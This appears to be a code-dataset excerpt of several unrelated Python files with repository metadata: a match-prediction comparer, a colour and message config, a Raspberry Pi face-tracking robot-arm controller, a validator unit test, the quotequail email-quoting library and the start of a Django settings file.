    write_json('data/alternate_names', alternate_names)
'''
def compare(file1, file2):
f1 = open(file1, 'r')
f2 = open(file2, 'r')
right_counter = 0
wrong_lines = []
for i in range(50):
r1 = f1.readline()
r2 = f2.readline()
r1 = r1.strip('\n')
r2 = r2.strip('\n')
if r1[-1:] == r2[-1:]:
right_counter += 1
else:
wrong_lines.append(i)
print('Wrong lines are: %s\nAmount of wrongs is %i\n\nAmount of rights is %i\nWell Done!' % (str(wrong_lines), len(wrong_lines), right_counter))'''
def compare(f1, f2):
    """Compare two prediction CSVs row by row and print tallies.

    Both files are assumed to share a layout where columns 2-3 hold the
    two team names, columns 4-5 the scores and column 6 the result —
    TODO confirm against the file format. The header row of each file is
    skipped and iteration stops at the first empty line in either file.
    """
    file1 = open(f1, 'r')
    file2 = open(f2, 'r')
    file1.readline()  # skip header row
    file2.readline()
    right_results = 0
    right_scores = 0
    incorrect_teams = 0
    while True:
        r1 = file1.readline()
        r1 = r1.strip('\n')
        r2 = file2.readline()
        r2 = r2.strip('\n')
        if not r1 or not r2:
            break
        r1 = r1.split(',')
        r2 = r2.split(',')
        print(r1)
        print(r2)
        # The team pairing must match before scores are worth comparing.
        if r1[2] != r2[2] or r1[3] != r2[3]:
            incorrect_teams += 1
            continue
        if r1[4] == r2[4] and r1[5] == r2[5]:
            right_scores += 1
        if r1[6] == r2[6]:
            right_results += 1
    # NOTE(review): file1/file2 are never closed.
    print ('Number of incorrect team predictions is %i\n\nNumber of right results is %i\n\nNumber of right scores is %i'
    % (incorrect_teams, right_results, right_scores))
def cmp_line(file1, file2):
    """Step through two files side by side: each press of Enter prints
    the next line of each file.

    Loops until stdin is exhausted (input() then raises EOFError); once a
    file runs out of lines its readline() simply yields ''.
    """
    f1 = open(file1, 'r')
    f2 = open(file2, 'r')
    while True:
        i = input()  # value unused; any keypress advances one line
        print(f1.readline(), end="")
        print(f2.readline(), end="")
compare('actual_brazil_2014.csv', 'predicted_brazil_5')
| 2,902 | 0 | 184 |
5ccdda389df3723602d93a8ee43208eb6dde9c1e | 125 | py | Python | eyed/db/__init__.py | ThousandMileEye/Eye | b0eca371fed5e01353ebddf7e4c400927decf0d2 | [
"Apache-2.0"
] | null | null | null | eyed/db/__init__.py | ThousandMileEye/Eye | b0eca371fed5e01353ebddf7e4c400927decf0d2 | [
"Apache-2.0"
] | 55 | 2017-12-21T15:20:36.000Z | 2019-01-20T02:49:41.000Z | eyed/db/__init__.py | ThousandMileEye/Eye | b0eca371fed5e01353ebddf7e4c400927decf0d2 | [
"Apache-2.0"
] | 3 | 2018-05-18T09:02:36.000Z | 2019-12-29T10:27:44.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from db import SessionFactory, Engine

# __all__ must contain attribute *names* (strings); listing the objects
# themselves makes `from ... import *` raise a TypeError.
__all__ = [
    'SessionFactory',
    'Engine',
]
| 12.5 | 37 | 0.672 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from db import SessionFactory, Engine
__all__ = [
SessionFactory,
Engine
]
| 0 | 0 | 0 |
15464d100b378bacafa095cea5a8e320fa5b16fc | 2,596 | py | Python | core2pkgs/core2pkgs/config.py | DmitryRyumin/pkgs | 8d0b1e03495f2b4d6da96664a222fecac8d98e74 | [
"MIT"
] | 2 | 2019-09-19T13:22:48.000Z | 2020-01-13T17:03:46.000Z | core2pkgs/core2pkgs/config.py | DmitryRyumin/pkgs | 8d0b1e03495f2b4d6da96664a222fecac8d98e74 | [
"MIT"
] | null | null | null | core2pkgs/core2pkgs/config.py | DmitryRyumin/pkgs | 8d0b1e03495f2b4d6da96664a222fecac8d98e74 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Глобальный файл настроек
"""
# ######################################################################################################################
# Класс для выделения текста
# ######################################################################################################################
class Color:
"""Класс для выделения текста"""
# ------------------------------------------------------------------------------------------------------------------
# Конструктор
# ------------------------------------------------------------------------------------------------------------------
# ------------------------------------------------------------------------------------------------------------------
# Свойства
# ------------------------------------------------------------------------------------------------------------------
@property
@property
@property
@property
@property
# ######################################################################################################################
# Класс для сообщений
# ######################################################################################################################
class Messages(Color):
"""Класс для сообщений"""
# ------------------------------------------------------------------------------------------------------------------
# Конструктор
# ------------------------------------------------------------------------------------------------------------------
| 34.613333 | 120 | 0.277735 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Глобальный файл настроек
"""
# ######################################################################################################################
# Класс для выделения текста
# ######################################################################################################################
class Color:
    """ANSI escape sequences for colouring/styling terminal output.

    Each code is stored once in the constructor and exposed read-only
    through a property of the same name.
    """

    def __init__(self):
        # SGR (Select Graphic Rendition) escape codes.
        self._green = '\033[92m'  # bright green foreground
        self._red = '\033[91m'    # bright red foreground
        self._blue = '\033[94m'   # bright blue foreground
        self._bold = '\033[1m'    # bold weight
        self._end = '\033[0m'     # reset every attribute

    @property
    def green(self):
        """Escape code that switches output to green."""
        return self._green

    @property
    def red(self):
        """Escape code that switches output to red."""
        return self._red

    @property
    def blue(self):
        """Escape code that switches output to blue."""
        return self._blue

    @property
    def bold(self):
        """Escape code that switches output to bold."""
        return self._bold

    @property
    def end(self):
        """Escape code that resets colour and weight."""
        return self._end
# ######################################################################################################################
# Класс для сообщений
# ######################################################################################################################
class Messages(Color):
    """Russian-language console message templates, plus the colour codes
    inherited from Color.

    The template strings themselves are user-facing runtime data and are
    therefore kept in Russian.
    """
    # ------------------------------------------------------------------------------------------------------------------
    # Constructor
    # ------------------------------------------------------------------------------------------------------------------
    def __init__(self):
        super().__init__()  # run the base-class constructor (sets up the colour codes)
        # Startup banner template: timestamp, author, email, maintainers, version.
        self._metadata = '[{}] Запуск:' \
                         '\n\tАвтор: {}\n\t' \
                         'Email: {}\n\t' \
                         'Сопровождающие: {}\n\t' \
                         'Версия: {}'
        self._format_time = '%Y-%m-%d %H:%M:%S'  # timestamp format
        self._invalid_arguments = '[{}{}{}] Неверные типы аргументов в "{}" ...'
        self._invalid_file = '[{}{}{}] Необходимые значения в файле не найдены ...'
| 1,001 | 0 | 184 |
4ea1a7e3af7017746226259f4bbb840efd076b0c | 5,261 | py | Python | RaspberryPi/main.py | effx13/ArduinoRobotArm_MDP | 5c11829766b8b7134aabd8902ecc698998c25b84 | [
"MIT"
] | 2 | 2021-11-01T11:02:44.000Z | 2021-12-01T05:40:24.000Z | RaspberryPi/main.py | effx13/ArduinoRobotArm_MDP | 5c11829766b8b7134aabd8902ecc698998c25b84 | [
"MIT"
] | 1 | 2021-12-01T05:33:16.000Z | 2021-12-01T05:33:16.000Z | RaspberryPi/main.py | effx13/ArduinoRobotArm_MDP | 5c11829766b8b7134aabd8902ecc698998c25b84 | [
"MIT"
] | null | null | null | import cv2
import imutils
import time
import threading
import serial
import RPi.GPIO as GPIO
from bluetooth import *
from serial.serialutil import SerialException
# -------------------변수 선언 부분-------------------
port = "/dev/ttyACM0"
reset_timer_seconds = -1
angles = [150, 120, 130]
arduino = serial.Serial(port, 115200, timeout=1)
haarcascade_file = '/home/pi/ArduinoRobotArm_MDP/RaspberryPi/haarcascade/haarcascade_frontalface_alt2.xml'
GPIO.setmode(GPIO.BCM)
GPIO.setup(2, GPIO.OUT)
GPIO.setup(3, GPIO.OUT)
server_socket = BluetoothSocket(RFCOMM)
# -------------------타이머 쓰레드 부분-------------------
# -------------------블루투스 함수 부분-------------------
# -------------------모터 제어 함수 부분-------------------
"""
멀티스레드로 send_serial과 read_serial를 상주시켜서 계속해서 시리얼을 주고 받음.
"""
# -------------------OpenCV 함수 부분-------------------
faceCascade = cv2.CascadeClassifier(haarcascade_file) # 얼굴 학습 파일 불러오기
# eyeCascade = cv2.CascadeClassifier('./haarcascade/haarcascade_eye.xml')
video_capture = cv2.VideoCapture(0)
prevTime = 0
# -------------------초기화 부분-------------------
read_thread = threading.Thread(target=read_serial, args=(arduino,))
read_thread.start()
send_thread = threading.Thread(target=send_serial, args=(arduino,))
send_thread.start()
timer_thread = threading.Thread(target=reset_timer)
timer_thread.start()
bluetooth_thread = threading.Thread(target=get_bluetooth)
bluetooth_thread.start()
# -------------------반복문 부분-------------------
while True:
_, frame = video_capture.read()
curTime = time.time()
sec = curTime - prevTime
prevTime = curTime
fps = 1 / sec
fps = "FPS : %0.1f" % fps
frame = imutils.resize(cv2.flip(frame, 1), width=320, height=240) # 라즈베리파이 연산력 부족으로 해상도 리사이즈
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
canvas = detect(gray, frame)
cv2.rectangle(frame, (110, 120), (210, 60), (0, 0, 255), 2)
cv2.putText(canvas, fps, (0, 13),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0))
cv2.imshow('canvas', canvas)
if cv2.waitKey(30) == 27: # esc 눌렀을때 종료
break
video_capture.release()
cv2.destroyAllWindows()
| 31.315476 | 110 | 0.547234 | import cv2
import imutils
import time
import threading
import serial
import RPi.GPIO as GPIO
from bluetooth import *
from serial.serialutil import SerialException
# -------------------변수 선언 부분-------------------
port = "/dev/ttyACM0"
reset_timer_seconds = -1
angles = [150, 120, 130]
arduino = serial.Serial(port, 115200, timeout=1)
haarcascade_file = '/home/pi/ArduinoRobotArm_MDP/RaspberryPi/haarcascade/haarcascade_frontalface_alt2.xml'
GPIO.setmode(GPIO.BCM)
GPIO.setup(2, GPIO.OUT)
GPIO.setup(3, GPIO.OUT)
server_socket = BluetoothSocket(RFCOMM)
# -------------------타이머 쓰레드 부분-------------------
def reset_timer():
    """Background-thread loop: ticks the shared countdown once a second.

    While reset_timer_seconds is positive it is decremented; when it
    reaches exactly 0 the servo angles are restored to the home pose
    [150, 120, 130] and the countdown is parked at -1 (disabled).
    """
    global reset_timer_seconds, angles
    while True:
        if reset_timer_seconds > 0:
            reset_timer_seconds -= 1
        time.sleep(1)
        if reset_timer_seconds == 0:
            angles = [150, 120, 130]
            print("자리 초기화")  # "position reset"
            reset_timer_seconds = -1
# -------------------블루투스 함수 부분-------------------
def get_bluetooth():
    """Accept one Bluetooth RFCOMM client and stream servo targets from it.

    Each received packet is expected to be a UTF-8 string "X,Y,Z"; the
    three integers replace the shared angles list and the auto-reset
    countdown is disabled (-1).

    NOTE(review): send() is given a str (not bytes), and a malformed
    packet would raise out of this thread — confirm the peer protocol.
    """
    global angles, reset_timer_seconds
    server_socket.bind(("", 1))
    server_socket.listen(1)
    client_socket, address = server_socket.accept()  # blocks until a client connects
    print("Accepted connection from ", address)
    client_socket.send("bluetooth connected!")
    while True:
        data = client_socket.recv(1024).decode('utf-8')
        print(data)
        X, Y, Z = data.split(",")
        print(f"X: {X}, Y: {Y}, Z: {Z}")
        angles = list(map(int, [X, Y, Z]))
        reset_timer_seconds = -1
# -------------------모터 제어 함수 부분-------------------
"""
멀티스레드로 send_serial과 read_serial를 상주시켜서 계속해서 시리얼을 주고 받음.
"""
def send_serial(arduino):
    """Background-thread loop: push the current servo angles to the
    Arduino every 0.25 s as a comma-separated UTF-8 string.
    """
    global angles
    while True:
        c = str(int(angles[0])) + "," + str(int(angles[1])) + "," + str(int(angles[2])) # sent as "angle1,angle2,angle3"
        c = c.encode('utf-8')
        try:
            arduino.write(c)
            time.sleep(0.25) # minimum 0.25 s gap between serial messages
        except SerialException:
            print("예외 발생")  # "exception occurred"
def read_serial(arduino):
    """Background-thread loop: drain lines sent back by the Arduino and
    discard them (the debug print is commented out).
    """
    while True:
        if arduino.readable():
            val = arduino.readline()
            # len(val) here is the *byte* length (evaluated before the
            # rebinding); the slice drops the trailing character,
            # presumably the newline — TODO confirm for multi-byte input.
            val = val.decode()[:len(val) - 1]
            if val != '':
                pass
            # print(val)
# -------------------OpenCV 함수 부분-------------------
faceCascade = cv2.CascadeClassifier(haarcascade_file) # 얼굴 학습 파일 불러오기
# eyeCascade = cv2.CascadeClassifier('./haarcascade/haarcascade_eye.xml')
def detect(gray, frame):
    """Find faces in the grayscale frame, annotate the colour frame, and
    nudge the shared servo angles so a single face drifts toward the
    target box x:[110, 210], y:[60, 120].

    LED policy: green only when exactly one face is visible, red
    otherwise. Returns the annotated frame.
    """
    global reset_timer_seconds
    faces = faceCascade.detectMultiScale(gray, scaleFactor=1.03, minNeighbors=5, minSize=(
        100, 100), flags=cv2.CASCADE_SCALE_IMAGE)
    face_count = len(faces)
    if face_count == 0:
        GPIO.output(2, True)  # red LED on, green LED off
        GPIO.output(3, False)
    elif face_count == 1:
        GPIO.output(2, False)  # red LED off, green LED on
        GPIO.output(3, True)
        for (x, y, w, h) in faces:
            reset_timer_seconds = 10  # re-arm the 10 s return-to-home countdown
            center_x = int(x + w / 2)  # face centre
            center_y = int(y + h / 2)
            cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)  # face bounding box
            cv2.line(frame, (center_x, center_y), (center_x, center_y), (0, 255, 0), 5)  # face centre dot
            # face_gray = gray[y:y + h, x:x + w]
            # face_color = frame[y:y + h, x:x + w]
            # `angles` is mutated in place (no `global` needed for item
            # assignment); each axis is bounds-checked against [10, 170]
            # before nudging.
            if center_x < 110:
                print("왼쪽으로 치우침")  # "drifted left"
                if angles[0] > 10:
                    angles[0] -= 0.5
            elif center_x > 210:
                print("오른쪽으로 치우침")  # "drifted right"
                if angles[0] < 170:
                    angles[0] += 0.5
            if center_y < 60:
                print("위로 치우침")  # "drifted up"
                if angles[1] < 170:
                    angles[1] += 0.5
                if angles[2] < 170:
                    angles[2] += 0.5
            elif center_y > 120:
                print("아래로 치우침")  # "drifted down"
                if angles[1] > 10:
                    angles[1] -= 1  # NOTE(review): 1 here vs 0.5 everywhere else — possible typo, confirm
                if angles[2] > 10:
                    angles[2] -= 0.5
    else:
        GPIO.output(2, True)  # multiple faces: red LED on, green LED off
        GPIO.output(3, False)
        print(f'{face_count}개의 얼굴이 감지됨')  # "{n} faces detected"
    return frame
video_capture = cv2.VideoCapture(0)
prevTime = 0
# -------------------초기화 부분-------------------
read_thread = threading.Thread(target=read_serial, args=(arduino,))
read_thread.start()
send_thread = threading.Thread(target=send_serial, args=(arduino,))
send_thread.start()
timer_thread = threading.Thread(target=reset_timer)
timer_thread.start()
bluetooth_thread = threading.Thread(target=get_bluetooth)
bluetooth_thread.start()
# -------------------반복문 부분-------------------
while True:
_, frame = video_capture.read()
curTime = time.time()
sec = curTime - prevTime
prevTime = curTime
fps = 1 / sec
fps = "FPS : %0.1f" % fps
frame = imutils.resize(cv2.flip(frame, 1), width=320, height=240) # 라즈베리파이 연산력 부족으로 해상도 리사이즈
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
canvas = detect(gray, frame)
cv2.rectangle(frame, (110, 120), (210, 60), (0, 0, 255), 2)
cv2.putText(canvas, fps, (0, 13),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 255, 0))
cv2.imshow('canvas', canvas)
if cv2.waitKey(30) == 27: # esc 눌렀을때 종료
break
video_capture.release()
cv2.destroyAllWindows()
| 3,258 | 0 | 113 |
d11b9271af6be6db5151310a6e7b78b927945e06 | 556 | py | Python | src/pytypes/tests/test_alnum_filter.py | tonybaloney/onefuzz | e0f2e9ed5aae006e0054387de7a0ff8c83c8f722 | [
"MIT"
] | 2,692 | 2020-09-15T17:54:21.000Z | 2022-03-31T11:58:57.000Z | src/pytypes/tests/test_alnum_filter.py | tonybaloney/onefuzz | e0f2e9ed5aae006e0054387de7a0ff8c83c8f722 | [
"MIT"
] | 980 | 2020-09-18T18:23:01.000Z | 2022-03-30T22:20:43.000Z | src/pytypes/tests/test_alnum_filter.py | tonybaloney/onefuzz | e0f2e9ed5aae006e0054387de7a0ff8c83c8f722 | [
"MIT"
] | 177 | 2020-09-16T00:10:56.000Z | 2022-03-30T21:18:10.000Z | #!/usr/bin/env python
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import unittest
from onefuzztypes.validators import check_alnum_dash
if __name__ == "__main__":
unittest.main()
| 23.166667 | 76 | 0.638489 | #!/usr/bin/env python
#
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
import unittest
from onefuzztypes.validators import check_alnum_dash
class TestFilter(unittest.TestCase):
    """Unit tests for the alphanumeric-plus-dash input validator."""

    def test_filter(self) -> None:
        # Valid inputs (letters, digits, dashes) must pass silently.
        for ok in ("abc-", "-abc12A"):
            check_alnum_dash(ok)
        # Punctuation and control characters must be rejected.
        for bad in (".", "abc'", "abc;", "abc\r", "abc\n", "abc;", "abc\x00"):
            with self.assertRaises(ValueError):
                check_alnum_dash(bad)
if __name__ == "__main__":
unittest.main()
| 274 | 15 | 49 |
df80bfdf494e35c26f3d249e25ba71884bd5df77 | 5,554 | py | Python | quotequail/__init__.py | noufalsalim/quotequail | 400d5105cf5104f20ffb3f9b401b71ec088b5838 | [
"MIT"
] | 35 | 2015-07-21T03:37:37.000Z | 2022-03-14T13:22:40.000Z | quotequail/__init__.py | noufalsalim/quotequail | 400d5105cf5104f20ffb3f9b401b71ec088b5838 | [
"MIT"
] | 18 | 2015-11-19T00:52:17.000Z | 2022-02-02T08:03:26.000Z | quotequail/__init__.py | noufalsalim/quotequail | 400d5105cf5104f20ffb3f9b401b71ec088b5838 | [
"MIT"
] | 24 | 2016-01-27T10:16:00.000Z | 2022-02-26T23:44:29.000Z | # -*- coding: utf-8 -*-
# quotequail
# a library that identifies quoted text in email messages
import re
from . import _internal
__all__ = ['quote', 'quote_html', 'unwrap', 'unwrap_html']
def quote(text, limit=1000):
"""
Takes a plain text message as an argument, returns a list of tuples. The
first argument of the tuple denotes whether the text should be expanded by
default. The second argument is the unmodified corresponding text.
Example: [(True, 'expanded text'), (False, '> Some quoted text')]
Unless the limit param is set to None, the text will automatically be quoted
starting at the line where the limit is reached.
"""
lines = text.split('\n')
found = _internal.find_quote_position(lines, _patterns.MAX_WRAP_LINES, limit)
if found != None:
return [(True, '\n'.join(lines[:found+1])), (False, '\n'.join(lines[found+1:]))]
return [(True, text)]
def quote_html(html, limit=1000):
"""
Like quote(), but takes an HTML message as an argument. The limit param
represents the maximum number of lines to traverse until quoting the rest
of the markup. Lines are separated by block elements or <br>.
"""
from . import _html
tree = _html.get_html_tree(html)
start_refs, end_refs, lines = _html.get_line_info(tree, limit+1)
found = _internal.find_quote_position(lines, 1, limit)
if found == None:
# No quoting found and we're below limit. We're done.
return [(True, _html.render_html_tree(tree))]
else:
start_tree = _html.slice_tree(tree, start_refs, end_refs,
(0, found+1), html_copy=html)
end_tree = _html.slice_tree(tree, start_refs, end_refs,
(found+1, None))
return [
(True, _html.render_html_tree(start_tree)),
(False, _html.render_html_tree(end_tree)),
]
def unwrap(text):
"""
If the passed text is the text body of a forwarded message, a reply, or
contains quoted text, a dictionary with the following keys is returned:
- type: "reply", "forward" or "quote"
- text_top: Text at the top of the passed message (if found)
- text_bottom: Text at the bottom of the passed message (if found)
- from / to / subject / cc / bcc / reply-to: Corresponding header of the
forwarded message, if it exists. (if found)
- text: Unindented text of the wrapped message (if found)
Otherwise, this function returns None.
"""
lines = text.split('\n')
result = _internal.unwrap(lines, _patterns.MAX_WRAP_LINES,
_patterns.MIN_HEADER_LINES,_patterns.MIN_QUOTED_LINES)
if result:
typ, top_range, hdrs, main_range, bottom_range, needs_unindent = result
text_top = lines[slice(*top_range)] if top_range else ''
text = lines[slice(*main_range)] if main_range else ''
text_bottom = lines[slice(*bottom_range)] if bottom_range else ''
if needs_unindent:
text = _internal.unindent_lines(text)
result = {
'type': typ,
}
text = '\n'.join(text).strip()
text_top = '\n'.join(text_top).strip()
text_bottom = '\n'.join(text_bottom).strip()
if text:
result['text'] = text
if text_top:
result['text_top'] = text_top
if text_bottom:
result['text_bottom'] = text_bottom
if hdrs:
result.update(hdrs)
return result
def unwrap_html(html):
"""
If the passed HTML is the HTML body of a forwarded message, a dictionary
with the following keys is returned:
- type: "reply", "forward" or "quote"
- html_top: HTML at the top of the passed message (if found)
- html_bottom: HTML at the bottom of the passed message (if found)
- from / to / subject / cc / bcc / reply-to: Corresponding header of the
forwarded message, if it exists. (if found)
- html: HTML of the forwarded message (if found)
Otherwise, this function returns None.
"""
from . import _html
tree = _html.get_html_tree(html)
start_refs, end_refs, lines = _html.get_line_info(tree)
result = _internal.unwrap(lines, 1, _patterns.MIN_HEADER_LINES, 1)
if result:
typ, top_range, hdrs, main_range, bottom_range, needs_unindent = result
result = {
'type': typ,
}
top_range = _html.trim_slice(lines, top_range)
main_range = _html.trim_slice(lines, main_range)
bottom_range = _html.trim_slice(lines, bottom_range)
if top_range:
top_tree = _html.slice_tree(tree, start_refs, end_refs, top_range,
html_copy=html)
html_top = _html.render_html_tree(top_tree)
if html_top:
result['html_top'] = html_top
if bottom_range:
bottom_tree = _html.slice_tree(tree, start_refs, end_refs,
bottom_range, html_copy=html)
html_bottom = _html.render_html_tree(bottom_tree)
if html_bottom:
result['html_bottom'] = html_bottom
if main_range:
main_tree = _html.slice_tree(tree, start_refs, end_refs, main_range)
if needs_unindent:
_html.unindent_tree(main_tree)
html = _html.render_html_tree(main_tree)
if html:
result['html'] = html
if hdrs:
result.update(hdrs)
return result
| 32.863905 | 88 | 0.620994 | # -*- coding: utf-8 -*-
# quotequail
# a library that identifies quoted text in email messages
import re

from . import _internal
from . import _patterns
__all__ = ['quote', 'quote_html', 'unwrap', 'unwrap_html']
def quote(text, limit=1000):
    """
    Takes a plain text message as an argument, returns a list of tuples. The
    first argument of the tuple denotes whether the text should be expanded by
    default. The second argument is the unmodified corresponding text.
    Example: [(True, 'expanded text'), (False, '> Some quoted text')]
    Unless the limit param is set to None, the text will automatically be quoted
    starting at the line where the limit is reached.
    """
    lines = text.split('\n')
    found = _internal.find_quote_position(lines, _patterns.MAX_WRAP_LINES, limit)
    # PEP 8: compare against None with `is not`, never `!=`.
    if found is not None:
        # Split at the boundary: lines up to and including `found` stay
        # expanded; everything after is the collapsed quoted part.
        return [(True, '\n'.join(lines[:found+1])),
                (False, '\n'.join(lines[found+1:]))]
    return [(True, text)]
def quote_html(html, limit=1000):
    """
    Like quote(), but takes an HTML message as an argument. The limit param
    represents the maximum number of lines to traverse until quoting the rest
    of the markup. Lines are separated by block elements or <br>.
    """
    from . import _html
    tree = _html.get_html_tree(html)
    start_refs, end_refs, lines = _html.get_line_info(tree, limit+1)
    found = _internal.find_quote_position(lines, 1, limit)
    # PEP 8: test for None with `is`, not `==`.
    if found is None:
        # No quoting found and we're below limit. We're done.
        return [(True, _html.render_html_tree(tree))]
    else:
        # Split the tree at the boundary: head stays expanded, tail is quoted.
        start_tree = _html.slice_tree(tree, start_refs, end_refs,
                                      (0, found+1), html_copy=html)
        end_tree = _html.slice_tree(tree, start_refs, end_refs,
                                    (found+1, None))
        return [
            (True, _html.render_html_tree(start_tree)),
            (False, _html.render_html_tree(end_tree)),
        ]
def unwrap(text):
    """
    If the passed text is the text body of a forwarded message, a reply, or
    contains quoted text, a dictionary with the following keys is returned:
    - type: "reply", "forward" or "quote"
    - text_top: Text at the top of the passed message (if found)
    - text_bottom: Text at the bottom of the passed message (if found)
    - from / to / subject / cc / bcc / reply-to: Corresponding header of the
      forwarded message, if it exists. (if found)
    - text: Unindented text of the wrapped message (if found)
    Otherwise, this function returns None.
    """
    lines = text.split('\n')
    result = _internal.unwrap(lines, _patterns.MAX_WRAP_LINES,
            _patterns.MIN_HEADER_LINES,_patterns.MIN_QUOTED_LINES)
    if result:
        typ, top_range, hdrs, main_range, bottom_range, needs_unindent = result
        # Each *_range is a (start, end) pair or a falsy placeholder.
        text_top = lines[slice(*top_range)] if top_range else ''
        text = lines[slice(*main_range)] if main_range else ''
        text_bottom = lines[slice(*bottom_range)] if bottom_range else ''
        if needs_unindent:
            text = _internal.unindent_lines(text)
        result = {
            'type': typ,
        }
        # Join the line lists back into trimmed strings.
        text = '\n'.join(text).strip()
        text_top = '\n'.join(text_top).strip()
        text_bottom = '\n'.join(text_bottom).strip()
        # Only non-empty sections appear in the returned dict.
        if text:
            result['text'] = text
        if text_top:
            result['text_top'] = text_top
        if text_bottom:
            result['text_bottom'] = text_bottom
        if hdrs:
            result.update(hdrs)
        return result
def unwrap_html(html):
    """
    If the passed HTML is the HTML body of a forwarded message, a dictionary
    with the following keys is returned:
    - type: "reply", "forward" or "quote"
    - html_top: HTML at the top of the passed message (if found)
    - html_bottom: HTML at the bottom of the passed message (if found)
    - from / to / subject / cc / bcc / reply-to: Corresponding header of the
      forwarded message, if it exists. (if found)
    - html: HTML of the forwarded message (if found)
    Otherwise, this function returns None.
    """
    from . import _html
    tree = _html.get_html_tree(html)
    start_refs, end_refs, lines = _html.get_line_info(tree)
    result = _internal.unwrap(lines, 1, _patterns.MIN_HEADER_LINES, 1)
    if result:
        typ, top_range, hdrs, main_range, bottom_range, needs_unindent = result
        result = {
            'type': typ,
        }
        # Trim whitespace-only edges off each detected line range.
        top_range = _html.trim_slice(lines, top_range)
        main_range = _html.trim_slice(lines, main_range)
        bottom_range = _html.trim_slice(lines, bottom_range)
        if top_range:
            # html_copy lets the slice preserve the original markup text.
            top_tree = _html.slice_tree(tree, start_refs, end_refs, top_range,
                                        html_copy=html)
            html_top = _html.render_html_tree(top_tree)
            if html_top:
                result['html_top'] = html_top
        if bottom_range:
            bottom_tree = _html.slice_tree(tree, start_refs, end_refs,
                                           bottom_range, html_copy=html)
            html_bottom = _html.render_html_tree(bottom_tree)
            if html_bottom:
                result['html_bottom'] = html_bottom
        if main_range:
            main_tree = _html.slice_tree(tree, start_refs, end_refs, main_range)
            if needs_unindent:
                _html.unindent_tree(main_tree)
            html = _html.render_html_tree(main_tree)
            if html:
                result['html'] = html
        if hdrs:
            result.update(hdrs)
        return result
| 0 | 0 | 0 |
6a4c6a5ead1b8e02e2e5f40e25c2514b6405df58 | 7,876 | py | Python | disturbance/settings.py | thakurpriya1990/disturbance | 47f9ce5ae5f1b02d97ace11f1041e96daf7e4556 | [
"Apache-2.0"
] | 1 | 2020-06-30T04:47:42.000Z | 2020-06-30T04:47:42.000Z | disturbance/settings.py | thakurpriya1990/disturbance | 47f9ce5ae5f1b02d97ace11f1041e96daf7e4556 | [
"Apache-2.0"
] | 3 | 2021-05-12T00:05:54.000Z | 2022-03-02T10:37:22.000Z | disturbance/settings.py | thakurpriya1990/disturbance | 47f9ce5ae5f1b02d97ace11f1041e96daf7e4556 | [
"Apache-2.0"
] | 1 | 2020-06-16T05:51:52.000Z | 2020-06-16T05:51:52.000Z | from django.core.exceptions import ImproperlyConfigured
import os, hashlib
import confy
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
confy.read_environment_file(BASE_DIR+"/.env")
os.environ.setdefault("BASE_DIR", BASE_DIR)
from ledger.settings_base import *
ROOT_URLCONF = 'disturbance.urls'
SITE_ID = 1
DEPT_DOMAINS = env('DEPT_DOMAINS', ['dpaw.wa.gov.au', 'dbca.wa.gov.au'])
SUPERVISOR_STOP_CMD = env('SUPERVISOR_STOP_CMD')
SYSTEM_MAINTENANCE_WARNING = env('SYSTEM_MAINTENANCE_WARNING', 24) # hours
DISABLE_EMAIL = env('DISABLE_EMAIL', False)
MEDIA_APP_DIR = env('MEDIA_APP_DIR', 'das')
MEDIA_APIARY_DIR = env('MEDIA_APIARY_DIR', 'apiary')
SPATIAL_DATA_DIR = env('SPATIAL_DATA_DIR', 'spatial_data')
ANNUAL_RENTAL_FEE_GST_EXEMPT = True
INSTALLED_APPS += [
'reversion_compare',
'bootstrap3',
'disturbance',
'disturbance.components.main',
'disturbance.components.organisations',
'disturbance.components.users',
'disturbance.components.proposals',
'disturbance.components.approvals',
'disturbance.components.compliances',
'disturbance.components.das_payments',
'taggit',
'rest_framework',
'rest_framework_datatables',
'rest_framework_gis',
'reset_migrations',
'ckeditor',
'smart_selects',
]
ADD_REVERSION_ADMIN=True
# maximum number of days allowed for a booking
WSGI_APPLICATION = 'disturbance.wsgi.application'
'''REST_FRAMEWORK = {
'DEFAULT_PERMISSION_CLASSES': (
'disturbance.perms.OfficerPermission',
)
}'''
#REST_FRAMEWORK = {
# 'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.LimitOffsetPagination',
# #'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
# 'PAGE_SIZE': 5
#}
REST_FRAMEWORK = {
'DEFAULT_RENDERER_CLASSES': (
'rest_framework.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
'rest_framework_datatables.renderers.DatatablesRenderer',
),
#'DEFAULT_FILTER_BACKENDS': (
# 'rest_framework_datatables.filters.DatatablesFilterBackend',
#),
#'DEFAULT_PAGINATION_CLASS': 'rest_framework_datatables.pagination.DatatablesPageNumberPagination',
#'PAGE_SIZE': 20,
}
USE_DJANGO_JQUERY= True
# JQUERY_URL = True
MIDDLEWARE_CLASSES += [
'disturbance.middleware.BookingTimerMiddleware',
'disturbance.middleware.FirstTimeNagScreenMiddleware',
'disturbance.middleware.RevisionOverrideMiddleware',
'disturbance.middleware.DomainDetectMiddleware',
]
TEMPLATES[0]['DIRS'].append(os.path.join(BASE_DIR, 'disturbance', 'templates'))
TEMPLATES[0]['DIRS'].append(os.path.join(BASE_DIR, 'disturbance','components','organisations', 'templates'))
TEMPLATES[0]['DIRS'].append(os.path.join(BASE_DIR, 'disturbance','components','emails', 'templates'))
TEMPLATES[0]['OPTIONS']['context_processors'].append('disturbance.context_processors.apiary_url')
del BOOTSTRAP3['css_url']
#BOOTSTRAP3 = {
# 'jquery_url': '//static.dpaw.wa.gov.au/static/libs/jquery/2.2.1/jquery.min.js',
# 'base_url': '//static.dpaw.wa.gov.au/static/libs/twitter-bootstrap/3.3.6/',
# 'css_url': None,
# 'theme_url': None,
# 'javascript_url': None,
# 'javascript_in_head': False,
# 'include_jquery': False,
